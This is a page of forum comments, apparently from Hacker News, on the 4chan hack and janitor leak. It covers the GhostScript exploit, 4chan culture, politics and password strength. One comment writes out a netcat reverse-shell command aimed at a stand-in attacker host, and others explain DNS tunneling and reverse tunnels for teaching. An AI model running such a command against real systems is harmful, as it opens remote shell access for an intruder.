4chan Sharty Hack And Janitor Email Leak

>If cars (the non-software parts) were made like this, there would be millions of them breaking down by the side of the road daily.

I’m an automotive CE… we’re getting there.

Cars used to be DONE at lots… now, there are weeks to finish code before the customer lays hands on, and that time is factored in now.

Worse with OTA updates. Now, so long as it’s fixed if enough customers complain that’s good enough.

Cars used to be great. Then some morons connected them to the internet for no good reasons.

Reminds me of Bill Gates & GM (apparently discredited though)

https://www.snopes.com/fact-check/car-balk/

> Everything seems to be hastily thrown together features that barely work and piles of debt that will never get fixed.

move fast and break things is going to be studied in the future as a hilariously clusterfuk misuse of an idea.

> It's a wonder anything actually even works.

> If cars were made like this, there would be millions of them breaking down by the side of the road daily.

Next to the software side of things, I also often wonder about planes. But, until now, they have proved fairly resilient to falling out of the sky, except for the well known "recent" events. Which is fairly surprising, knowing the levels of mismanagement at play. We've been lucky..

> If cars (the non-software parts) were made like this, there would be millions of them breaking down by the side of the road daily.

Well, cars did break down by the side of the road daily! That's why it used to be good advice even in the 90s to always have a basic set of tools in your trunk, why AAA offered roadside assistance already in 1915, and why part of the European CDL is enough basic mechanic knowledge to self-help when the truck breaks down.

It's only in the last 20-ish years that "smarts" became cheap and ubiquitous enough in cars that the car can warn preemptively. And additionally, regulatory requirements on quality, parts availability and public expectations went up, exerting competitive pressure.

> If cars (the non-software parts) were made like this

The critical software parts of cars (non user-facing entertainment systems gripes aside). Think engine control modules, ABS, etc.

This stuff is mission critical and almost always works. I think about that a lot.

Why do I feel so specifically targeted by this.

Though maybe I am of the philosophy of prototyping as I like to code for problems that I am facing right now in real life and wish like damn... wish someone could build something cool & though I use AI quite hard. Its actually because I am currently in school and I just don't have the time to code but I face some issues which I genuinely feel need to be solved right now. (Maybe even as just a proof of concept) so that I can later write good readable code later on when I go into university.

Forget cars, imagine if we treated government systems that millions of people's entire medical care/retirement/lives/national security/secrets/proof of existence depend upon this way? Luckily we treat those systems a little more seriously even though it costs us a little bit more/doesn't allow us to move fast and break things in that space.

To be fair, a car isn't accessible to 8 billion+ people at any given second. That's the scary part about the internet now. You can't just have a fun little garden and only have to protect the veggies from rabbits. Them gnawing on your lettuce is your biggest issue. Now, you have to protect your veggies from essentially professional armed raiders who either burn your garden to the ground for lolz or a cryptocoin ransom.

In this day and age, like... is anything secure at this point? You say hastily... but even the biggest "walls" get breached, constantly. Just claiming hastily to feel better about your own glass walls is just as bad.

I think about this daily.

The current FreeBSD version the hacker displayed was from around the time of the sale so that tracks.

Nishimura for most part become a Japanese public personality - he has wrote for Japanese tabloids and has a YT channel.

Based on one of the comments in the leaked source, at least php 6, though no idea what specific version:

> // In PHP 6 this... doesn't seem to do anything? Let's try again in 7.

> it's not really common knowledge that PDF is basically just a subset of postscript.

Because that's not actually true? Check out the table in the PDF specification, Appendix A, p985, listing all the PDF operators and their totally different PostScript equivalents, when there are any: https://opensource.adobe.com/dc-acrobat-sdk-docs/pdfstandard...

The PDF imaging model is mostly borrowed from PostScript, though PDF's imaging model also supports partial transparency. The actual files themselves are totally different.

In this case, no PDF files were involved at all, but a PostScript file renamed to .pdf, which was used to exploit an old insecure GhostScript's PostScript execution engine (PostScript is a programming language, unlike PDF) or maybe parser:

> According to S0I1337, it was done by exploiting a vulnerability on 4chan's outdated GhostScript version from 2012 by uploading a malformed PostScript file renamed to PDF to gain arbitrary code execution as 4chan didn't check if files with PDF extensions were actually PDF files -- https://wiki.soyjak.st/Great_Cuckset, see also the image in A_D_E_P_T's comment https://news.ycombinator.com/item?id=43699395

You basically just described the XPM format.

Your writing reminds me of a Tom Scott video.

thank you for this laugh

More recently there was an iOS 0-day GIF exploit requiring no user interaction: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-i...

> With the AGPL license being legal kryptonite I wonder if license compatibility drove the decision

Unlikely. There's a number of other strong indications that basic maintenance was being neglected, including shell transcripts showing that at least one server was running FreeBSD 10.1 (released in 2014, end-of-life in 2018), and PHP code using the mysql extension (which was deprecated in PHP 5.6 = 2014 and removed in PHP 7.0 = 2015).

It's probably not a coincidence that 4chan was sold to a new owner in 2015.

4chan aren’t modifying the Ghostscript code, why would they care about the license?

uninformed or malicious FUD.

agpl is no different than gpl if you're distributing applications. if you host the functionality of the application with improvements then it's rightly so cryptonite and you deserve it.

That's why it's a good idea to block connections of all protocols into address ranges where an attacker might be able to host a service. Even on internal networks, if you are a corporation.

But it gets better than tunneling over ICMP: DNS tunneling. Pretty much all systems can talk to a DNS resolver. If it resolves arbitrary host names, you can set up a DNS for a zone you control and requests will end up there. With tools like iodine (requires root and a binary on the target), you can tunnel your traffic conveniently (and slowly).

> Usually the attacker, on their own computer, or some other server they have root on, will open a port and expose it to the internet and listen. The exploit payload will then make an outbound connection to that port. Once it's connected, the exploit will give the attacker's computer shell access. Search terms include 'reverse shell'.

Also "reverse tunnel" as a more general term, it can open any service not just those giving shell access. There have been similar hacks where the implanted tunnel have access to databases that weren't properly secured (anyone remember back when SQL Server defaulted to having a blank password for "sa" and many didn't change that thinking their firewall, which was really little more than a simple NAT setup, was sufficient protection?).

This is why there is the mantra "NAT is not a firewall": if something internal has no business making outgoing connections it should be blocked as well as incoming connections being difficult (also because there are various other NAT busting attacks too).

Shellcode is usually weirdly formed native machine code, typically written in a "return-oriented programming" style, that can be inserted with a buffer overflow and somehow jumped to. But usually not bytecode.

It was not - attacker ran an exploit that have him a remote shell access. No shellcode was involved (that's for binary exploits which is not what happened here)

You can crate a reverse shell with just netcat. On your victim machine, where you can run a command but not necessarily listen on a port you can run something like:

    nc attacker.ip 9000 | /bin/bash

The reverse shell gives you further access to the victim machine and can be entirely scripted. You can then use additional exploits for privilege elevation or just pilfer whatever you've got access to.

Note this a super simple demonstration of the concept.

>There are a lot of people who have nothing to contribute to a conversation,

While true, the few people who do have something to contribute to a conversation simply can't do so on a highly-sanitized, heavily-moderated forum. The things they'd say would be too upsetting to a status quo, and the status quo will win. There is a real difference between something truly insightful and flat earth theory, but outsourcing that decision to a reddit mouth-breather whose only qualification for moderating is that he showed up to r/whatever back in 2013 before anyone else is not the way to detect those differences.

Wait until you're banned without appeal from some place because you called it the master branch out of 15 years of habit then get back to me if this moderation thing is all its cracked up to be. 4chan, as bad as it is, is the least insane of all internet forums, and humanity would be ashamed of that if it wasn't the root cause.

HN has a good model for technical discussions, and the fact that it's a forum with a limited scope whose audience mostly consists of technology professionals probably helps a lot in filtering low-effort posting (not to downplay the role of moderation). But when it comes to emotional topics like anything political, it clearly devolves into what you described.

That makes me wonder if there are forums out there that focus on current events in politics or economics and successfully filter emotionally-charged posts; the few commentators on X who manage to stay detached are the only people keeping me on algo-driven social media.

4chan has always claimed to resist it, but 4chan was never immune to being shuffled a specific way.

No it was a stock response to proposals for board/site raids from people who had lost an argument or been banned and wanted to retaliate (but without offering comedy potential). Kinda like when corporate people discovered flash mobs and tried to use them for free marketing.

A thing about the site is that comments not threaded or ranked. When the site started getting a reputation you had a lot of tourist beggars coming in fishing for free labor. NYPA is about getting those people to stop cluttering the place with garbage.

You're saying that the demographics of 4chan is roughly similar to most any site on the internet?

And thats exactly what I don't like, there's no good reason why the internet has to be like this. It's simple, just be the same online like how you'd be irl. Tired of all these people that would talk shit online but become weak irl.

Then again this is just my opinion, I don't like 4chan because of the mentioned reasons so I don't visit it. Nothing trollworthy about that.

> That's antithetical to many of the foundational rules of the internet, which are core to 4chan culture.

The most foundational rule of the Internet was the sharing of information, and that's a coincidence of hackers being the first to adopt it. Being macho and emotionally stunted was never a foundational value, that's immature manchildren equating kindness with weakness.

I have an awesome circle of people on Bluesky that I'm connected with that very much care about each others feelings. I'm sure that's not universal on there, but the corner that I'm in on there has probably been my most pleasant experience on the internet ever.

Ha, not even close. Not anonymous, upvoting and vote manipulation mechanics, and a very soft and liberal political bend, I'm leaning.

I like it though, good to have some opposites to view so you don't get stuck in a bubble.

HN is older 4chan. On the imageboard, you have the constant feeling you are arguing against 12 year olds.

Or the countless people that like and use 4chan, and would never remotely consider perpetrating such a heinous act.

I see dog whistle (if its sufficiently subtle to qualify) racism every time I look at my FB feed, along with lots of ragebait and idiocy.

Can we pause and admire the sheer contagiousness of the debate? We are now extending it to the meta-realm, discussing the possible mental states that led to one or more of the original participants adopting certain lines of reasoning...

As the quip goes, there are two hard problems in computer science: cache invalidation, naming things, and off-by-one errors.

I'm not sure about the "fencepost error" part, but he's thinking of days as durations rather than points. It's early in the thread, about halfway down the first page:

> You don't start counting on sunday, it hasn't been a day yet, you don't start counting til monday. You can't count the day that it is, did you never take basic elementrary math?

Put in other terms, TheJosh uses "Sun - Sun" as inclusive start and exclusive end, while Justin-27 uses "Sun - Sat" as inclusive start and inclusive end.

I think TheJosh mixed things up when trying to explain it (durations vs inclusive/exclusive), so doubles down and comes up with weirder stuff later in the thread. I didn't read the whole thing though, stopped near the bottom of the first page.

Maybe I have that. I can totally solve much more complicated problems but this fencepost shit just messes with. Recently I thought last quarter ended March 1st because a quarter has 3 months and March is the third month.

I had to watch that at 2x to keep the thoughts-per-second above catatonic.

In the same vein, for those who haven't seen it, the classic "Is soup a drink?" debate: https://m.youtube.com/watch?v=IDNuz_VFJtU

Somewhere, there are ancient Greek rhetoric teachers spinning in their graves.

That was a treat, thank you.

Cultured gentlemen such as yourself may also appreciate:

>Intellectuals Solve Life's Big Mysteries | Big Brain by Tom and Don

[nsfw discussion] https://www.youtube.com/watch?v=YcYzzS7PwG8

This is amazing, thank you.

[flagged]

Because if you ask an economist you'll get two answers, neither of which will be helpful.

Do you have a link or reference to this? I'm going to be thinking about this for weeks now.

Well, the thing is that if it's Sunday you can't know if it's the Sunday at the end of the week or the Sunday at the beginning of the week. Therefore, each Sunday is in two weeks and should be counted twice, 8 + 2 = 10 days in a week. Don't feel bad, a lot of people miss this.

I don't think it is out of date at all.

Anti-jewish content was there 10 years ago as well. The board is full of white supremacist posts when I checked yesterday with lots of threads complaining about non-white races. There's absolutely no indication that it has been overtaken by developing countries.

Just because they changed their name to "groyper" doesn't mean they aren't alt-right anymore.

As for support for authoritarian regimes like russia, it is obvious that they are running propaganda on the website and want to sow division in the US by encouraging fringe groups like these.

> Also, as is being corroborated by other online circles like the Nick Fuentes "Groyper" movement

On 4chan, Nick Fuentes is loudly and routinely criticized as a closeted homosexual who hates women and encourages his impressionable underage followers to also hate women. He's a more active part of the incel pipeline than 4chan these days and is called out for it on 4chan.

(He's also as a federal informant, since he was never thrown in the slammer for plainly inciting J6 activity. The feds had him dead to rights for that and just let him. I mention this not because it's relevant to the point, just for completeness.)

I would still call it one of the epicenters. Yes, many venues that were previously only multlipliers like some prolific streamers / Youtubers / TikTok channels have grown and cultivated their own distinct subcommunities which form new epicenters.

However, from what I can see /pol/ still serves as significant breeding ground where people deeply committed to their views can get together in a "mask-off" manner without fear of moderation, while they have to be more "mask-on" on platforms that are more dissemination-focused like Youtube.

Look at some actual billboards in Arkansas where radio stations are describing themselves as "Alt-Right".

The fact that you had to explain this is evidence that those who try to fight the kind of ideology which is spreading on that website have no hope.

Interesting input, thanks for sharing!

I've been "lurking" on 4chan since it was 2 years old. I think that is more than enough time. Also not interested in conforming to group think on 4chan when the entire point of the place is no censorship.

There's little doubt in my mind that for every person on websites like /pol/ that's taking the piss with subversive "be as offensive/absurd to the status quo as you can" style of humor there's at least one other person that's internalized those kinds of views as a genuine belief system.

I don't browse 4chan anymore though I did used to (a lot) years ago. Take what I say as anecdotal evidence but I used to chat with a group of people I met through a former friend that seemed to start with a similar mindset to the one you have and then went down the pipeline over a few years of unironically espousing the most absurd abhorrent kind of thoughts you'd see on /pol/ and feeling 100% justified in doing so. They had gotten so used to seeing and interacting with such content day in and day out that it became normalized for them and they started to think that such a large forum existing with people saying similar things validated the way they began to think and act.

I think my main takeaway for sites like /pol/ is that you can't really pretend to act one way for humor for extended periods of time without it rubbing off on you in one way or another and that there are too many young people out there that stumble upon places like that and adopt those views since they lack the world experience yet to have formed their own.

As confucius famously said, any community that gets its kicks out of pretending to be idiots will soon be filled with real idiots who think they are in good company.

A lot of it is ironic, but a lot less than it used to be.

> I will give my opinion of it because I think most people don't get it and take the board wayy too seriously.

I don't take the board seriously.

The posts I made that got deleted for being "off topic" were mocking the alt-right and I just wanted to get a reaction out of people rather than trying to sway anyone. I know I'm not going to convince anyone and I'm not trying to get anyone elected.

So when I see my posts get deleted or I even get banned for being "off topic" while a post on the same topic with an alt-right bent stays up with 300 replies,it's a clear indication that 4chan has a strong political bias and is absolutely not free speech anymore as most people seem to think it is.

The intent of the posters may be ironic subversion. But for those reading? There's no doubt some portion that mistake it for sincerity and are quietly being radicalised by it all. Poe's Law and all that

> While far-left views might be equally reprehensible, these views are not seen as equally politically incorrect. It's actually quite hard to hold politically incorrect far-left views unless you incorporate some far-right views – being so pro-trans that you hate biological women or something stupid. This is why you tend to see less left-wing content there. It's hard to be offensive and left-wing.

Have you considered that what you think is radical left-wing is just centrist, and that you are acclimated to such right-wing views that it appears radical-left? In such a case, it is hard to be politically incorrect while saying something centrist.

> If you're up for it I challenge you to be politically incorrect from a left-wing perspective without it being possible to argue that it's actually far-right.

I think anything from these would qualify:

* https://alphahistory.com/russianrevolution/expansion-of-the-...

* https://alphahistory.com/russianrevolution/lenins-hanging-or...

Those are far left. And don't say that they don't count or are too extreme or whatever, when literal Nazi quotes are being used for the right wing. Comparing 'trans-rights' to far left which using Nazis as the example of far right is nonsense. The Nazis would literally have murdered trans people just like real leftists would have murdered you for being bourgeoisie.

"you're typically missing the point."

You too buddy

interracial porn is frequently used by the alt-right racists to point out the evils of "race mixing" and to blame jews for being the producers of it. It is not an anti alt-right point at all.

Even if its posted by someone that is against the alt-right, it becomes a post to unify alt-right users.

It's a kink because it's a taboo for them

You can still be attracted to someone even if you think you are genetically superior. Or you can get off on interracial power dynamics. Lots of reasons.

Go look of descendants of American slaves who do DNA tests only to find out they have European ancestry.

I'm sorry, what? The 4chan community is racially tolerant because they post porn of all varieties and not just a few?

I think it's less the case now, but 4chan is absolutely still the source of new slang. It's just less concentrated on that one platform these days.

People were using "Based" and Gigachad in the late 2010s for years before the mainstream picked it up in the 20s.

Also for indie video games, many do find their attention and early fanbases on /v/ before they spread out to twitter. Largely because /v/ is very information sensitive and will pick up primary news usually minutes after they arrive.

‘Slop’ was a 2024 Oxford Dictionary word-of-the-year candidate, and what most of the people using it probably don’t realise is that it originated on 4chan as an abbreviation of ‘goyslop’.

Wiktionary has a surprisingly robust list

https://en.wiktionary.org/wiki/Category:English_4chan_slang

Moot lists some examples in this video:

https://youtu.be/a_1UEAGCo30?si=JMVO5ox3K2AhxrMY&t=97

Well either people thought my comment was to be taken literally, or they believe 4chan is culture and other hurting cultural gatherings like midsize live music venues were not.

"Redundant pair of LAMP stacks"

Damn you got two of those? That's advanced magic

yeah but the 'social media needs hyper-complex and opaque curation algorithms to control what the users see, otherwise it'd become unusable' argument is provably false. Companies just want to control the narrative and/or push ads/influencers/opinions into peoples faces, while trying to maintain the illusion of organic discussion.

For most of the period from 2020 to 2023, /pol/ has had more posts/day than any other board, often substantially more and it was 2nd most of the time. The /vt/ is a pretty distant 4th behind /v/.

I'm not entirely certain that I would call /pol/, which generates upwards of 110K posts/day a tiny phenomenon. It's about 13% of all 4chan posts. Add in /b/ and it's about a fifth.

And of course, casual bigotry is all over 4chan, not just /pol/.

https://4stats.io/

sorry buddy, but it's the nazi bar analogy. Let one nazi into your bar the whole bar is a nazi bar.

I don't care if some other sub-board is all sunshines and happiness, it's a nazi forum because of all the nazis that are coddled there.

the fash trend on /pol/ died somewhere around 2018 and has shifted significantly radleft in the years since. This is misunderstood by outsiders largely because /pol/ users don't actually hold these opinions, they just will represent whatever is the edgiest opinion at any given time.

And despite things like shooting pharma executives in broad daylight being mainstream now, /pol/lacks rightly recognize that this is still edgy upon edgy upon edgy. And thus they meme the shit out of it.

I've heard multiple times about a bit of lore that holds that 4chan once tried to brigade Stormfront, causing Stormfront to brigade back, and that was how the cross pollination occurred and started turning 4chan fascist.

No idea if this is true but it sounds plausible.

Good to know. My opinion of 4chan was formed 2010-ish, I guess I should, er, update it.

this might be conspirational thinking, but i don't think it's an accident that the site came out like this. yes, there's moderation, but the moderators are explicitly told to go easy on moderating racism[1]. it feels like once that kind of stuff isn't punished, it starts to snowball a change in the attitudes of the site as a whole.

that's not to say stringent moderation doesn't make a site less welcoming, though. it's about choosing what's the lesser evil to you, i guess.

[1]: https://www.vice.com/en/article/the-man-who-helped-turn-4cha...

/mpl/ still exists. Well, still existed until now.

Eh, they came in very late on that one and only on the absolute worst examples. It's still very prevalent.

Gwern talked about it when GPT 4.5 came out, a ton of breakthroughs with image and text AI came from anons trying to optimize models for their waifus. That's basically the origin of chat models in general - https://www.reddit.com/r/OpenAI/comments/1izpgct/comment/mf5...

Sites are surprisingly cheap to run all things considered - I remember asking the owner of an fairly prominent aerospace enthusiast forum (one of the biggest on the internet) how much he spends on hosting - he told me he hosts on a Linux box on DigitalOcean that runs phpBB, and he spends about $50/month for the whole website - not a crazy amount even for a hobbyist.

I guess the thing that really changed is our tolerance for bad actors. As far as I'm concerned even a 99% signal-to-noise ratio is unacceptable if the 1% represents a contingent of determinedly obnoxious and hateful people, and 4chan was never anywhere close to 99% signal.

ive always wondered, is there a way to use technology on a board style wesbite to enforce a higher quality culture? i toyed with the idea of requiring an org email similar to Blind except it could be a school email too, the hope being that after verification you are fully anon still just now with write privileges and that it would somehow lead to better quality discussions and engagements

There is no counter-culture anymore, not really. Society is virtually balkanized.

> Let me be bold: transphobia is counter-culture nowadays

No it's not. It's as mainstream as you get. One of the two major parties ran explicitly on a platform of transphobia ("keep men out of women's bathroom", "your daughter is being beaten up in sports by a man"). You can't call it counter-culture anymore.

Meh, /pol/ leaks but people also gets called out for it all the time. Overall I'd say containment style moderation like the one 4chan has works pretty well if you're looking to host "discussion" of a wide varity of topics.

The site was markedly different before and after those events. /pol/ didn't exist before those events and aggressive alt-right rants didn't constantly leak into every other board from it (and get treated with kid gloves or be allowed by mods, who were specifically instructed to do so).

Frog in boiling water moment. Most of us have had enough experience with the platform before, during and after this period to know that it's not going back to what it was.

Thank you for explaining it.

They do not. Reddit is a big corporate social media site and largely gets a pass in online discourse despite the horrible communities that do and have existed there.

I don't know. I've never created an account there. In it's early days it just seemed like they were trying to make a platform that could be monetized some day so I never bothered. I assumed incorrectly that it would just fade away.

If that is the case that might explain why so many on 4chan feel that different URL's are different sites. Most of the current members seemed to have shown up from Reddit. Most of the original members grew up and left, myself excluded. I still visit from time to time but don't stick around long as most threads and posters are obviously just 4chan-GPT and people being tricked into replying to it.

There are certainly overlapping circles between Reddit, 4chan and HN. 4chan people talk about and make fun of members of this site all the time. They also make fun of Reddit but don't seem to call out specific people on it.

Why? He seems better than the average foodtuber.

4chan was founded in 2003. I think reasonable people probably disagree on what constitutes the “early” internet and this is where the argument is. Google had been around for 5 years by this point and I (and I suspect many others) remained blissfully unaware of 4chan for a long time after 2003.

Many of the popular internet terms start on 4chan, and then move to reddit and the rest of the internet, and then eventually mainstream news, and 65 year olds mouths. This process takes about 3-5 years.

Small pedantic correction: “major hub of Internet culture” is “major subculture in English-speaking segment of Internet” (American segment?). In many other languages it was irrelevant.

It's so funny to read this.

I've been involved in "internet culture" since the early to mid 90s.

The only thing that I heard about that ever came out of 4chan was toxicity.

early belongs to slashdot

> "shoved down my throat."

Who shoves it down someone's throat though? I can't remember the last time I used tiktok, probably 3 or 4 years ago, and I don't feel like anyone forces me to.

It's incredibly easy to just not use those websites. My throat remains surprisingly clear with no effort.

You better believe 4chan is as much of a government space as those other social media sites are. Just because you don't have to give three forms of ID and a mobile phone number to post doesn't mean they're not involved.

It's an illusion, a very believable one in an internet where billionaires try to goad you to include your name and address with every thing you post. I don't see why people care so much about Doxxing when every social media company makes them do it for free.

Go back.

The joke on 4chins actually is that the Jannies do it for free. Never cared to fact check it, but it is a popular saying.

Also sage in all fields

What does Reddit have to do with this?

"Jannies" (janitors) are pseduo-mods on 4chan (the subject of the linked thread) who clean up posts and do other work, for free. Actual 4chan mods are paid.

> 4chan's design is early web 2.0, doesn't require you create an account, allows (pseudo) anonymous posting, content is mostly unfiltered, unmonetized, free & thought of as ephemeral, etc.

That is hardly unique. There are any number of phpbb (and other) boards that allow mostly the same that were/are/will continue to be the same. The only difference is the clientele and noteriaty, but I'd argue 4chan is basically the same thing as somethingawful is/was in that regard. People act like 4chan was this ground-breaking thing but it was just one of many many similar boards.

Also for 4chan, you'd only go to 4chan to go to 4chan. People went to geocities and xoom and angelfire and all the other old internet things for niche website content from individuals, not because of the site that hosted it. It's like going to a bar to chat vs going to a library to study: going to the bar/4chan is an undeniable part of the culture, but let's not pretend it is anything significantly different amongst a constellation of other chat/forum sites (somethingawful, fark, ebaumsworld, discord, IRC etc etc etc)

This is the dumbest nitpick, but:

> 4chan's design is early web 2.0

Web 2.0 (even early) was very JS heavy, coming down from the advent of Mootools/Prototype/etc and had a very specific visual design sense.

4chan is easily the last of the Web 1.0 sites, probably up there with Craigslist. They very much "just fucking work".

"Pre Dot Com Bust" is a pretty good definition for "Old Internet".

Geocities was the place to create and visit homepages for a large percentage of people using the internet in the 90s. You can see its influence in games such as Hypnospace Outlaw and modern hosts like Neocities.

Most boards on 4chan, like the origami board, food and cooking, pets and animals, retro gaming, toys, etc are relatively harmless and are just a different way to participate in discussions than using discord or reddit.

The staff has cut down a lot on organized harassment that 4chan was notorious for in recent years. Those people migrated to private discords, telegrams, and other forums (like kiwi farms, soy party, etc). Ex, #gamergate was mostly an 8chan, Twitter, reddit, and IRC phenomenon - #gg people would get banned if they tried posting about it on 4chan

Live by the sword, die by the sword I would say. You don't get to enjoy raising leopards and also get to be surprised when you become lunch one day

"The culture" of 4chan varies from board to board and even thread to thread.

the serious crime of... deleting egregious posts from a website

You don't like to lump people into groups by race/country of origin but find no cognitive dissonance in lumping people together by platform choice.

While a precise estimate is difficult to gauge it is supposed by professional analysts that a majority of hacks are state sponsored.

If the hacker is a state actor then I don't think anyone has learned anything about Free Speech.

Posting on 4chan just kept becoming increasingly user hostile, especially for casual users, you had to be really determined to post something: posts started requiring 24 hour email verification, and after that you had to wait ~10 minutes before being allowed to post, and finally you had to complete a nearly impossible captcha which could lock you out from posting for an undetermined amount of time just for failing. It became apparent that the owners were pushing the gold pass pretty damn hard, and it's advertised on literally every board page.

> there's no other online community i know of that still allows fully anonymous posting

Doesn't 8chan/kun still exist?

> there's no other online community i know of that still allows fully anonymous posting

Usenet?

It even has the issue of old posts disappearing when the retention at your UNIX system / ISP rolled over.

I haven't been there in like a decade but if nobody bumps your thread eventually your post falls off the last page and gets deleted no?

4chan has global rules and board-specific rules.

Racism, hate speech in general, as well as anything illegal, will quickly result in deletion and IP ban.

The site will also, as it's obvious, cooperate with authorities, when it comes to crimes.

4chan is far from being a free-speech absolutist site.

Mostly, but the few restrictions they do have led to even absolutist-er spinoffs like 8chan being founded.

Every website that allows content uploaded by users have moderators, you can be absolutist as you want but you can't allow CP for example, you also need to handle DMCA (unless you live in a country that couldn't care less).

No, it's mostly a cancer survivors support group. Every third post was about cancer, what is causing it, and frank expressions of helplessness in the face of it.

About half the posts were pornography, racist rants, or memes making fun of someone, often for being mentally handicapped.

Five percent was accusing the moderators of sleeping on the job.

Edit: I love that people are down-voting this, it really shows how much people like to have an opinion even while they can't recognize even the most obvious things that requires any information about the subject.

depends on the board you're browsing, if you're discussing gardening you won't have issues with the far-right

There are no true free speech absolutist sites on the open internet. To run a site under free speech absolutist principles would require allowing and refusing to moderate illegal content.

People like to confuse "free speech absolutism" for "tolerating right-wing speech" because the free speech absolutist narrative has been pushed by right-wing accelerationists, but every site has its limits, even 4chan.

Hate makes odd bedfellows at times.

https://en.wikipedia.org/wiki/Association_of_German_National...

No historian but wouldn't it be fair to call Hitler a zionist?

Do you think they voted for Kamala? One more contradiction won't make a difference to nazis...

Also Hitler was a Zionist too [1]. Israel's goal of housing every Jews on Earth somehow aligns with antisemites of the world wanting to get rid of them.

[1] https://en.wikipedia.org/wiki/Haavara_Agreement?wprov=sfla1

Sounds about like what I would have expected as a (also underage) user at the time. The suspicion was always that most of the memorable joke chains were probably just one guy self-replying (I always suspected that was the case for the hunter2 meme specifically). It didn't really matter, it was funny anyway.

Thanks for taking the time to reply, and thanks for the fun back then :)

>And the checks arrived on time every month: $0.00

Unexpectedly poignant.

For those OOTL about that last part, a common meme/troll of the moderators/jannies is

“They do it for free”

People would post rule breaking content and say “clean it up janny”

> These numbers helped me deduce that many boards' most infamous personalities were all the same guy.

Simultaneously one of the best and worst parts about the website was how much a single person could create influence. Some guy spamposting "30-year old boomer" memes eventually turned boomer and zoomer into mainstream terminology.

I remember a long time ago, a general that I would frequent attracted the attention of a lunatic who would frequently try to ruin threads by spam posting corrupted unloadable images until the bumpcap was reached. It made a successful thread with no incidents feel like a moment of success.

Well, so you say, but every single news website that I can find willing to say something on the matter is either The Daily Mail and similar things that also say they based their information on leaks on “social media rumors” or more reputable websites that also say it's a rumor that there's a leak. One would assume if it be so easily found and I'm so incompetent that these news websites could've found it themselves and come with more certain claims.

As long as "a lot of attempts" take longer than the time it'll take the sun to expand and envelop the earth, that's not really a problem.

Every form of authentication is either subject to "a lot of attempts" or trivial DoS (for when you rate limit the login API so now admins can't log in either). The principles behind modern authentication are mostly "how do we make verification require even more attempts if the attacker doesn't know the password".

What is "a lot of attempts"? I'm no expert in cryptography, but there's many orders of magnitude difference between a distributed bruteforce of a known hash, and bruteforcing over the web.

"a lot of attempts" is doing a LOT of heavy lifting here.

If your password was a set of random letters (both upper and lower case) and numbers and 20 characters long, then even if you could attempt 1,000 logins/second (a very high number for an online attack), it would take a whopping 2,232,000,000,000,000,000,000,000 years.

If you could do 1,000,000 logins/second, an absolutely absurd number for an online attack, that only takes 3 zeros off that number.

> "can't effectively be bruteforced like a user+password."

Only when the password is weak enough to bruteforce swiftly. It will take literally thousands of years to bruteforce strong passwords.

> someone with enough time will eventually get in

That's only correct if the password is weak. With enough entropy, it's practically impossible to brute force.

Genuine question that I haven't found a good solution to yet, if I want to just go to any old computer and ssh into my server, do I have to carry around a USB stick with the ssh key on or something? because I sure as hell wont be able to just remember it

That's my point - if you have a reasonably secure password (let's say 50-100 characters, fully random), it's extremely unlikely that anyone is ever going to even get beyond the basic auth prompt.

I wonder how long it's been since that was true. I think that era passed when most small businesses and individuals moved from self hosting to SaaS.